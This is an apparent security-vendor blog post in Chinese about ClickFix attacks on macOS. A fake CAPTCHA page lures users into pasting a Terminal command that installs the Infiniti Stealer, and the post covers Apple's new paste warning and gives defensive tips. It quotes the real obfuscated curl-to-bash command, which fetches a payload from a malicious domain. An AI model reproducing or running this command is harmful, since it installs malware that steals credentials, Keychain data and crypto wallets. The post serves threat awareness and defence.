macOS驚傳ClickFix資安風暴!駭客利用偽造CAPTCHA引誘用戶在終端機貼上惡意指令,竊取鑰匙圈與加密錢包。對此Apple已推出全新警示措施,全面防範新型社會工程攻擊。


在眾多電腦作業系統中,macOS 一直給人簡單、順暢又安心的使用體驗。它是由 Apple 專為 Mac 電腦打造的系統,整體設計強調直覺與一致性,不論是新手還是長期使用者,都能很快上手。從開機到日常操作,macOS 的流暢度與穩定性讓人印象深刻,特別是在多工處理或長時間使用的情況下,依然能維持良好表現。


很多人會選擇 macOS,其實很大的原因在於「安全」。相較於其他系統,它在預設上就幫使用者做好不少防護。例如當你從網路下載應用程式時,系統會先幫你檢查來源是否可靠,降低安裝到惡意軟體的風險。如果遇到來路不明或可疑的程式,macOS 也會跳出提醒,讓使用者在執行前多一層判斷,而不是毫無防備地開啟。


此外,macOS 對於系統本身的保護也做得相當嚴謹。重要的系統檔案不會輕易被更動,即使是不小心下載了不安全的程式,也比較難對整體系統造成破壞。這種設計讓電腦在長期使用下仍能保持穩定,不容易出現越用越慢或問題越來越多的情況。macOS 也非常重視使用者的隱私權。當應用程式想要存取你的相機、麥克風、定位或檔案時,系統都會明確詢問你的同意,並且可以隨時在設定中查看與調整權限。這代表你的資料不會被悄悄讀取,而是由你自己決定誰可以使用,讓人用起來更加安心。


就算是如此安全的系統,也還是會成為駭客攻擊的目標。以下來說明駭客利用社會工程針對macOS進行惡意攻擊的案例


駭客利用社會工程針對macOS進行惡意攻擊

調查中發現駭客會透過各種管道(例如:發送釣魚郵件、投放惡意廣告或社群媒體連結等..)將使用者引導至 update-check[.]com 這個惡意網域。而駭客會在該網址上架設一個非常逼真的 Cloudflare 人類驗證(CAPTCHA)頁面,引誘被害者上鉤。


駭客製作逼真的 Cloudflare 人類驗證(CAPTCHA)頁面



ClickFix攻擊是利用社會工程學而非系統的漏洞進行攻擊,就是透過說服使用者在不知情的清況下自行執行命令來實現攻擊。整個過程就是經由散佈
一個偽造的驗證頁面指示訪客開啟終端機,貼上指令,然後按下執行鍵。一旦執行,感染過程就會立即開始。這種技術在 Windows 系統上很流行,但現在也被移植到 macOS 系統,操作步驟也針對 macOS 進行了調整:

Command + 空白鍵 > 開啟終端機 > 貼上命令。由於是透過使用者直接運行命令,許多傳統的防禦措施都被繞過了。這種攻擊方式沒有漏洞、沒有惡意附件、也沒有惡意下載,非常的隱密。


執行惡意指令被植入惡意軟體進行惡意攻擊

被害者貼上的執行指令bash <(curl -sSfL $(echo aHR0cHM6Ly91cGRhdGUtY2hlY2suY29tL20vN2Q4ZGYyN2Q5NWQ5 | base64 --decode)),實際上就是在執行一個用base64編碼的內容,

解密後發現內容是一個惡意網址 https://update-check.com/m/7d8df27d95d9。一但執行指令就會下載Infiniti Stealer惡意程式進行攻擊。


Base64 解密後內容為一個惡意網址


這次駭客很狡猾,惡意軟體雖然以 Python 3.11 撰寫,但其封裝技術卻避開了常見的 PyInstaller,改採用Nuitka 編譯器Nuitka 會將 Python 代碼轉譯(Transpile)為 C 語言,再編譯成原生的二進制文件,讓偵查反編譯的難度呈幾何級數上升。


惡意軟體反編譯內容


此惡意程式會以截圖的方式竊取相關資訊,例如:


  ● Chromium 瀏覽器及 Firefox 的登入帳密

  ● macOS鑰匙圈(Keychain)

  ● 加密貨幣錢包帳密

  ● 重要的開發文件(例如,.env檔案)


所有遭竊數據都會透過 HTTP POST 請求傳送到遠端伺服器,並在行動完成後向威脅者發送 Telegram 通知,讓人防不勝防。


APPLE提出相對應防範措施

由於是使用者貼上命令執行,將現有系統上的安全措施繞過,

惡意軟體才可以被植入系統。蘋果在 macOS Tahoe 26.4 中引入了一項安全功能,可阻止在終端機中貼上和執行潛在的有害命令,並提醒用戶可能存在的風險


macOS 新增風險貼上警告提示


為了保護用戶免受此類攻擊,蘋果最新的 macOS 版本會在用戶將潛在惡意命令貼到終端機時延遲執行,並顯示有關相關風險的警告資訊。告知使用者目前系統未受到任何損害,因為命令的執行已被中止,並解釋詐騙者經常透過各種管道散佈惡意指令。如果使用者不理解命令的作用,並且意識到指令來自不可信來源,可以選擇不貼上該命令。他們也可以忽略警告並繼續執行操作。但是,建議使用者只有在理解該指令的作用時才選擇忽略警告並繼續執行的做法。


流程圖:



流程圖


防範駭客針對macOS進行ClickFix惡意攻擊:

 ● 建立良好習慣,如果真有需要複製指令執行,請先了解或是查詢這段指令的用途,現在網路資源很發達,很快就可以查到資訊,不要別人提供指令就直接貼上執行非常的危險。

 ● 將系統更新至新版的macOS系統,在你貼上執行指令時,會先告警你貼上指令執行的風險,提高安全意識。

 ● 定期員工資安訓練或請外部資安專家安排訓練課程,讓員工學習辨識更多的惡意攻擊手法。


有任何資安問題,歡迎隨時與NEITHNET團隊聯繫!

參考資料:

1.https://www.bleepingcomputer.com/news/security/apple-adds-macos-terminal-warning-to-block-clickfix-attacks/  

2.https://www.malwarebytes.com/blog/threat-intel/2026/03/infiniti-stealer-a-new-macos-infostealer-using-clickfix-and-python-nuitka 

3.https://www.bleepingcomputer.com/news/security/new-infinity-stealer-malware-grabs-macos-data-via-clickfix-lures/